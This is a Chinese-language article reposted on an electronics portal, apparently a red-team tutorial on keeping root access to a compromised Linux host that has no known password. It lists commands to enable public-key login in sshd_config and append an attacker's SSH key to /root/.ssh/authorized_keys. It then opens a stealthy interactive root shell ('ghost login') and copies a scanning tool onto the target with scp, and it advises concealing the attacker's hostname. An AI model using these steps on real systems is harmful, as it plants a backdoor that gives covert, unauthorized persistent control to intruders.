0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

实战|无密码Linux主机利用公钥直接连接

jf_Fo0qk3ln 来源:zeo.cool 2023-01-13 09:06 次阅读

0x00 前提

以前的老东西,拿出水一篇

一般是通过 Rce,提权等等情况,拿到目标 linux 的 root 权限

主要是没有密码, hash 跑不出来,机器无法正常出网

就可以去试着正向链接

0x01 首先目标主机,修改目标 Ssh 服务配置

启用ssh证书登录,并重启SSH 服务

echo RSAAuthentication yes >> /etc/ssh/sshd_config
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd

0x02 本地linux上生成密钥

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa

注意:这一步最好去一个纯净的Linux生成,因为这个key会暴露你的主机名

38fcad70-92da-11ed-bfe3-dac502259ad0.png

//找见id_rsa.pub自行拷贝出来
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/
//赋于权限
chmod 777 /home/xxxx/Desktop/id_rsa.pub
/root/.ssh/文件夹里面有俩文件:
id_rsa(私钥)
id_rsa.pub(公钥)

0x03 linux目标机写入公钥

自行上传公钥到内网linux,并将其保存到/root/.ssh/目录下,文件名改为authorized_keys,或者命令执行用echo追加

如目标已事先存在authorized_keys文件,直接往最后追加即可

注意:再操作之前要对原authorized_keys进行“备份”,以备不时之需。

# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= Zeo@ZeoMacBook-Pro.local >> /root/.ssh/authorized_keys

0x04 幽灵登录

ssh -T root@192.168.1.1 /usr/bin/bash -i

3936172c-92da-11ed-bfe3-dac502259ad0.png

0x05 利用Scp 无密码互传文件

scp -P 22 -r /root/fsacn root@10.211.55.11:/usr/tmp/fsacn
审核编辑:汤梓红
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • Linux
    +关注

    关注

    87

    文章

    11304

    浏览量

    209483
  • 主机
    +关注

    关注

    0

    文章

    995

    浏览量

    35129
  • 公钥
    +关注

    关注

    0

    文章

    22

    浏览量

    12039
  • SSH
    SSH
    +关注

    关注

    0

    文章

    189

    浏览量

    16337
  • root
    +关注

    关注

    1

    文章

    86

    浏览量

    21393

原文标题:实战|无密码Linux主机利用公钥直接连接

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    蓝牙连接主机可否直接连接保存的地址,不用每次扫描再连接

    蓝牙连接主机可否直接连接保存的地址,不用每次扫描再连接?蓝牙第一次主从机连了以后,我记下了从机的地址,利用flash保存下来了下次
    发表于 04-06 15:11

    git、私钥使用经验

    今天在windows用了git,整理下遇到的问题。首先生成密钥(包含和私钥),然后就等待通过管理员被服务器接收,接下来就可以clone了,但是最开始的时候,可以通过验证,但是不
    发表于 12-10 22:40

    什么是RSA指数

    什么是RSA指数RSA指数的选取
    发表于 01-01 06:09

    mbedTLS设置已知的问题求解

    我正在将代码从 esp8266 迁移到 esp32-c3。在旧代码中,bearssl 通过提供已知的可信来使用,该在工厂时保存在闪存中 // 假设给定的
    发表于 04-14 07:52

    【触觉智能 Purple Pi OH 开发板体验】网络状态连接ssh解决办法

    ] --------- 网络状态连接ssh解决办法 有多种连接SSH的方式,以下是其中一些常见的方式: 终端命令行连接: 在终端命令行中,使用ssh命令加上目标
    发表于 08-20 12:38

    基于Chebyshev多项式的密码系统算法

    介绍有限域Chebyshev多项式的定义和性质。针对基于有限域Chebyshev多项式的类ElGamal密码系统存在的弱点,提出一个新的
    发表于 04-08 08:36 13次下载

    基于椭圆曲线的EIGamal加密体制的组合分析及应用

    分析了基于椭圆曲线的EIGamal 密码的组合技术。基于种子和密钥映射的新技术可以实现从有限的种子变量产生几乎“无限”密钥对,有望解
    发表于 08-28 08:20 8次下载

    用JAVA语言实现RSA密码算法

    用JAVA语言实现RSA密码算法:本文阐述了公开密钥密码体制RSA算法的原理及实现技术。并在此基础上,给出了JAVA语言实现的RSA算法源代码。关键词:ILSA体制;
    发表于 02-10 10:27 58次下载

    密码分析简介

    对公密码体制的密码分析历史的形成,给出一些重要结果的描述和重要文献的历史发展线索,同时对2010年-2014年有限域和椭圆曲线的离散对数问题的突破性进展给予了简单介绍.自
    发表于 01-16 11:38 1次下载

    如何使用生成的加密数据和私钥解密数据

    是最早、应用最广泛的密码系统之一。它以其创始人Ron Rivest、AdiShamir和Leonard Adleman的名字命名,几乎成为
    发表于 12-06 10:23 7789次阅读

    EE-385:用加速器实现RSA密码系统

    EE-385:用加速器实现RSA密码系统
    发表于 04-29 17:29 7次下载
    EE-385:用<b class='flag-5'>公</b><b class='flag-5'>钥</b>加速器实现RSA<b class='flag-5'>密码</b>系统

    C -与ORACLE直接连接代码

    C -与ORACLE直接连接代码(肇庆理士电源技术有限)-C#-与ORACLE直接连接代码,有需要的可以参考!
    发表于 08-31 11:18 2次下载
    C -与ORACLE<b class='flag-5'>直接连接</b>代码

    本源量子算力赋能密码应用

    发展趋势进行广泛交流,深入探讨商用密码、区块链、隐私计算、后量子密码等技术的演进趋势。本源量子作为国内率先在金融领域探索量子计算应用的团队受邀参加,并就量子计算在
    发表于 11-26 16:28 913次阅读

    本源量子算力赋能密码应用

    发展趋势进行广泛交流,深入探讨商用密码、区块链、隐私计算、后量子密码等技术的演进趋势。本源量子作为国内率先在金融领域探索量子计算应用的团队受邀参加,并就量子计算在
    的头像 发表于 11-30 11:19 694次阅读
    本源量子算力赋能<b class='flag-5'>公</b><b class='flag-5'>钥</b><b class='flag-5'>密码</b>应用

    n头压接连接器怎样分辨好坏

    德索工程师说道N头压接连接器作为电子设备中的重要组件,其质量的好坏直接关系到整个系统的性能和稳定性。因此,正确分辨N头压接连接器的好坏至
    的头像 发表于 11-26 11:52 143次阅读
    n<b class='flag-5'>公</b>头压<b class='flag-5'>接连接</b>器怎样分辨好坏